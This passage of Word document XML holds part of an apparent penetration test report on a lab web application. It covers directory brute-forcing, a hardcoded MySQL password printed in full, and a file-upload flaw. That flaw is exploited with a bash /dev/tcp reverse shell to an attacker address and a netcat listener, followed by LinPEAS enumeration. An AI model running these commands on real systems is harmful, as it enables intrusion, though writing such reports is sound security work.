          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="39E25F12">
          <v:rect id="_x0000_i1300" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DF2791" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>5.3 Directory Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFDC92E" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621BCBF1" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>Hidden directories and administrative paths were discovered using directory brute-forcing techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6BBB69" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43018356" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>dirb http://192.168.1.X/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C184C11" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.X/FUZZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2AE924" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>An administrative panel was identified during enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783ED00F" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>Exposed administrative endpoints increase the attack surface and may lead to unauthorized access if not properly secured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEFCABA" w14:textId="3FE038A1" w:rsidR="00374C28" w:rsidRDefault="00374C28" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17E9497D" wp14:editId="1D900981">
            <wp:extent cx="5731510" cy="5417185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="62316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0088" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="5417185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9148EB" w14:textId="6E88CFF3" w:rsidR="00374C28" w:rsidRPr="00BA6C37" w:rsidRDefault="00374C28" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="119E9325" wp14:editId="638785BC">
            <wp:extent cx="5731510" cy="4465320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="213611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19256" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4465320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC0C251" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="3C660603">
          <v:rect id="_x0000_i1271" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB6270" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>5.4 Hardcoded Database Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462C2154" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260767A9" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>A configuration file was identified at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05209790" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>/var/www/html/academy/admin/includes/config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6328A2" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The file contained hardcoded database credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1AA6F7" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>$mysql_password = "My_V3ryS3cur3_P4ss";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128442F3" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>Hardcoded credentials allow direct database access, potentially resulting in data theft, modification, or complete application compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57737770" w14:textId="77777777" w:rsidR="00374C28" w:rsidRPr="00BA6C37" w:rsidRDefault="00374C28" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7709295C" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="31017E14">
          <v:rect id="_x0000_i1272" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35849A65" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>5.5 Insecure File Upload Leading to Remote Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B23E4CA" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0CF9E3" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>The web application allowed unrestricted file uploads within the images section, permitting attackers to upload executable PHP files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDB77DE" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Exploitation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>A malicious PHP reverse shell (reverseshell.php) was uploaded to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9269F8" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Reverse Shell Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F845B4" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>bash -i &gt;&amp; /dev/tcp/192.168.1.4/8081 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5396F8D6" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Listener Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D4F98A" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>nc -lvnp 8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42760E21" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>A reverse shell was successfully obtained as the web server user, allowing remote command execution on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F8EC7C" w14:textId="6307B3F1" w:rsidR="00374C28" w:rsidRPr="00BA6C37" w:rsidRDefault="00374C28" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="398F2068" wp14:editId="52C786C6">
            <wp:extent cx="5731510" cy="4436745"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="848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50860" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4436745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4608F083" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="214E88B4">
          <v:rect id="_x0000_i1273" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFFBA57" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>6. Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709C72E5" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.1 System Enumeration Using LinPEAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF0AC7C" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>After obtaining shell access, LinPEAS was executed to identify potential privilege escalation vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7815DD19" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>chmod +x linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CFEFEE" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3934745F" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Key Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61448B" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Misconfigured file permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8F4EC8" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Potential SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CE10AB" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Environment variable weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73673CDF" w14:textId="05671ED1" w:rsidR="00374C28" w:rsidRDefault="00374C28" w:rsidP="00374C28">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6015EA20" wp14:editId="00E07F43">
            <wp:extent cx="5731510" cy="4179570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5957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5377" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4179570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5400B7" w14:textId="38891226" w:rsidR="00374C28" w:rsidRDefault="00374C28" w:rsidP="00374C28">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D8A0D8C" wp14:editId="6263F9AE">
            <wp:extent cx="5731510" cy="4274185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="83064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2300" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4274185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1788E951" w14:textId="3BF0BF85" w:rsidR="00374C28" w:rsidRDefault="00374C28" w:rsidP="00374C28">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DF02B88" wp14:editId="2D187460">
            <wp:extent cx="5731510" cy="3570605"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8467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6730" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3570605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76986F82" w14:textId="337F37F6" w:rsidR="00374C28" w:rsidRPr="00BA6C37" w:rsidRDefault="00374C28" w:rsidP="00374C28">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3292A864" wp14:editId="1D8F390C">
            <wp:extent cx="5731510" cy="3322955"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2832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47206" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
